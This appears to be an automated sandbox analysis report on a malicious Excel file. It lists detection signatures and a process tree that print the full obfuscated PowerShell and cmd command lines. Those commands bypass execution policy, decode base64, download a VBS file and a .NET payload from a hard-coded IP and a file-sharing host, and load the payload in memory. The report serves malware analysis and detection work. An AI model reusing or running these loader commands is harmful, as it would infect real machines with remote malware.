
Windows Analysis Report
Swiftcopy.xla.xlsx

Overview

General Information

Sample name: Swiftcopy.xla.xlsx
Analysis ID: 1564317
MD5: 286b0bc4d52a6d17815a7724e03e980a
SHA1: e0a09d030b4f7d5839cb1b1a9c981d5c36e1ad47
SHA256: 4b125219e5ef649021f0599e73be512a80d987ff8224036445c15fbd684c07c4
Tags: xla, xlsx, user-abuse_ch

Detection

HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3620 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3948 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3100 cmdline: "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3148 cmdline: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'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'+[CHaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3328 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 2504 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADA.tmp" "c:\Users\user\AppData\Local\Temp\rpgvm2d4\CSCF316C6EB41654F6E91711E8CA420E01A.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 2764 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3044 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • powershell.exe (PID: 2036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • cleanup
No configs have been found
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthings[1].hta, Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 3044, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
    • 0xf8704:$b2: ::FromBase64String(
    • 0xf9dd6:$b2: ::FromBase64String(
    • 0xfa521:$b2: ::FromBase64String(
    • 0xfadaa:$b2: ::FromBase64String(
    • 0xfb49e:$b2: ::FromBase64String(
    • 0x115a1e:$b2: ::FromBase64String(
    • 0x173c:$b3: ::UTF8.GetString(
    • 0x24d8e:$b3: ::UTF8.GetString(
    • 0x2572b:$b3: ::UTF8.GetString(
    • 0x262ab:$b3: ::UTF8.GetString(
    • 0x27c2e:$b3: ::UTF8.GetString(
    • 0x54d77:$b3: ::UTF8.GetString(
    • 0x711b9:$b3: ::UTF8.GetString(
    • 0x71b4c:$b3: ::UTF8.GetString(
    • 0x90b60:$b3: ::UTF8.GetString(
    • 0x914f6:$b3: ::UTF8.GetString(
    • 0x9263c:$b3: ::UTF8.GetString(
    • 0xa1266:$b3: ::UTF8.GetString(
    • 0xa1313:$b3: ::UTF8.GetString(
    • 0xa1c7d:$b3: ::UTF8.GetString(
    • 0xa6587:$b3: ::UTF8.GetString(
Source: Process Memory Space: powershell.exe PID: 2036, Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 2036, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
      • 0x45c8f:$b2: ::FromBase64String(
      • 0x4637f:$b2: ::FromBase64String(
      • 0x4e60d:$b2: ::FromBase64String(
      • 0x50592:$b2: ::FromBase64String(
      • 0x696ed:$b2: ::FromBase64String(
      • 0x69dd6:$b2: ::FromBase64String(
      • 0x9f9db:$b2: ::FromBase64String(
      • 0xa0243:$b2: ::FromBase64String(
      • 0xa602b:$b2: ::FromBase64String(
      • 0xaf26f:$b2: ::FromBase64String(
      • 0xb3066:$b2: ::FromBase64String(
      • 0xcbf56:$b2: ::FromBase64String(
      • 0xcc60d:$b2: ::FromBase64String(
      • 0xff3e3:$b2: ::FromBase64String(
      • 0xffacd:$b2: ::FromBase64String(
      • 0x100b3f:$b2: ::FromBase64String(
      • 0x135f55:$b2: ::FromBase64String(
      • 0x136695:$b2: ::FromBase64String(
      • 0x136f8e:$b2: ::FromBase64String(
      • 0x137839:$b2: ::FromBase64String(
      • 0x1381b0:$b2: ::FromBase64String(

      System Summary

      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFt
      Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3620, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthings[1].hta
      Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command 
"(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 
-windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 
hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'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'+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3148, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , ProcessId: 2764, ProcessName: wscript.exe
